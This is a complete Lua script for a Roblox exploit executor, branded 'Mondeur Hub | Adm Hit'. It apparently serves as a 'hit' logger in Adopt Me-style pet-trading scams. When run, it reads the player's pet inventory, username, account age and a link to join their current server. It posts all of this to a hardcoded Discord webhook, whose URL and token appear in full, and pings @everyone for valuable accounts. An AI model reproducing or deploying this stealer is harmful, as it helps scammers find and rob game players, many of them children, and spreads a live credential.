--// MONDEUR HUB | ADM HIT 🦊 (REAL INVENTORY VERSION) - BULLETPROOF

local HttpService = game:GetService("HttpService")
local ClientData = require(game:GetService("ReplicatedStorage"):WaitForChild("ClientModules"):WaitForChild("Core"):WaitForChild("ClientData"))

-- =========================
-- 🔥 HARDCODED WEBHOOK
-- =========================
local WEBHOOK = "https://webhook.lewisakura.moe/api/webhooks/1408047737102012506/4VZHtB_G9RmikEuLs0-A6yP_0AXaYmb4_4Y3TyaG_0Wxem1-OvNBtPC9n71B4-SSzkUa"

-- 🎯 SMART THRESHOLD SYSTEM
local LOW_THRESHOLD = 300
local HIGH_THRESHOLD = 1500

-- =========================
-- 🌐 REQUEST DETECTION
-- =========================
local requestFunc = (syn and syn.request) or (http and http.request) or http_request or request

if not requestFunc then
    warn("❌ No request function")
    return
end

-- =========================
-- RARITY PRIORITY
-- =========================
local rarityPriority = {
    legendary = 5,
    ultra_rare = 4,
    rare = 3,
    uncommon = 2,
    common = 1
}

local rarityColors = {
    legendary = 0xFFD700,
    ultra_rare = 0xA020F0,
    rare = 0x1E90FF,
    uncommon = 0x32CD32,
    common = 0xB0B0B0
}

-- =========================
-- 🏷️ EMOJIS WITH SAFE PROPERTIES
-- =========================
local function getPetEmoji(name, properties)
    if not properties then return "🐾 " end
    
    local e = ""
    if name:find("red fox") then e = "🧑‍🌾 " 
    elseif name:find("disco bee") then e = "🪩 "
    elseif name:find("queen bee") then e = "🐝 " 
    end

    if properties.mega then e = e .. "🌈 " end
    if properties.neon then e = e .. "🟣 " end
    if properties.fly then e = e .. "🪽 " end
    if properties.ride then e = e .. "🏇 " end
    
    return e ~= "" and e or "🐾 "
end

-- =========================
-- 📦 PROCESS PETS (BULLETPROOF)
-- =========================
local function process(pets)
    if not pets then return {}, 0 end
    
    local map, total = {}, 0

    for unique_id, pet_data in pairs(pets) do
        if pet_data and type(pet_data) == "table" and pet_data.id then
            local petId = tostring(pet_data.id)
            
            -- SKIP UNTRADEABLE
            if petId:find("starter") or petId:find("practice") or petId:find("jiggly jerboa") then
                continue
            end
            
            -- CLEAN NAME
            local cleanName = petId:gsub("_", " "):gsub("%d", ""):gsub("%s+", " ")
            local displayName = (cleanName:sub(1,1):upper() .. cleanName:sub(2)):match("^%s*(.-)%s*$") or cleanName

            if not map[displayName] then
                map[displayName] = {
                    name = displayName,
                    count = 0,
                    rarity = ((pet_data.rarity or "common"):lower()),
                    properties = {
                        neon = pet_data.neon or (pet_data.properties and pet_data.properties.neon) or false,
                        mega = pet_data.mega or (pet_data.properties and pet_data.properties.mega) or false,
                        fly = pet_data.flyable or (pet_data.properties and pet_data.properties.flyable) or false,
                        ride = pet_data.rideable or (pet_data.properties and pet_data.properties.rideable) or false
                    }
                }
            end

            map[displayName].count = map[displayName].count + 1
            total = total + 10 
        end
    end

    local list = {}
    for name, v in pairs(map) do 
        table.insert(list, v) 
    end
    
    -- SMART SORT
    table.sort(list, function(a,b)
        local aPriority = rarityPriority[a.rarity] or 1
        local bPriority = rarityPriority[b.rarity] or 1
        if aPriority ~= bPriority then
            return aPriority > bPriority
        end
        return a.count > b.count
    end)

    return list, total
end

-- =========================
-- 📋 FORMAT (SAFE)
-- =========================
local function format(list)
    local t = {}
    for i = 1, math.min(#list, 12) do
        local p = list[i]
        local emoji = getPetEmoji(p.name:lower(), p.properties)
        table.insert(t, emoji .. p.name .. " x" .. p.count)
    end
    return (#t > 0 and table.concat(t,"\n")) or "No tradeable pets"
end

-- =========================
-- 📊 TIER
-- =========================
local function getTier(v)
    if v >= HIGH_THRESHOLD then return "🔴 HIGH" end
    if v >= LOW_THRESHOLD then return "🟡 MID" end
    return "🟢 LOW"
end

-- =========================
-- 🚀 RUN (100% BULLETPROOF)
-- =========================
local function Run(data)
    local list, total = process(data.pets or {})
    
    -- BULLETPROOF BEST PET EXTRACTION
    local bestPet = list[1] or {}
    local best = (bestPet.name and bestPet.count) and (bestPet.name.." x"..bestPet.count) or "None"
    local bestRarity = (bestPet.rarity and rarityColors[bestPet.rarity]) and bestPet.rarity or "common"
    local petList = format(list)
    local tier = getTier(total)

    local content = (tier == "🔴 HIGH") and "@everyone" or ""
    local color = rarityColors[bestRarity] or 0x2F3136

    local embed = {
        title = "🦊 Mondeur Hub | Adm Hit",
        description = "```" ..
            "👤 Display Name : "..(data.player.displayName or "Unknown").."\n"..
            "🆔 Username     : "..(data.player.username or "Unknown").."\n"..
            "📅 Account Age  : "..(data.player.accountAge or 0).." days\n"..
            "📱 Executor     : "..(data.player.executor or "Unknown").."\n"..
            "👥 Players      : "..(data.player.players or "0/0").."\n"..
            "💰 Total Value  : "..total.."\n"..
            "📊 Tier         : "..tier.."```",
        fields = {
            {name="🏆 Best Pet", value="```"..best.."```"},
            {name="🐶 Pets (Best → Worst)", value="```"..petList.."```"},
            {name="🌐 Join Server", value="[Click to Join]("..(data.joinLink or "https://www.roblox.com")..")"}
        },
        color = color,
        footer = {text = "Mondeuronbotton"}
    }

    local success, err = pcall(function()
        requestFunc({
            Url = WEBHOOK,
            Method = "POST",
            Headers = { ["Content-Type"] = "application/json" },
            Body = HttpService:JSONEncode({content = content, embeds = {embed}})
        })
    end)

    if success then
        print("✅ Webhook Sent!")
    else
        warn("❌ Error: " .. tostring(err))
    end
end

-- =========================
-- EXECUTE (SAFE)
-- =========================
local success, inventory = pcall(function()
    return ClientData.get("inventory")
end)

local pets = (success and inventory and inventory.pets) and inventory.pets or {}

Run({
    player = {
        displayName = game.Players.LocalPlayer.DisplayName or "Unknown",
        username = game.Players.LocalPlayer.Name or "Unknown",
        accountAge = game.Players.LocalPlayer.AccountAge or 0,
        executor = (identifyexecutor and identifyexecutor()) or "Unknown",
        players = #game.Players:GetPlayers().."/"..game.Players.MaxPlayers
    },
    joinLink = "https://www.roblox.com/games/start?placeId=" .. tostring(game.PlaceId) .. "&instanceId=" .. tostring(game.JobId),
    pets = pets
})
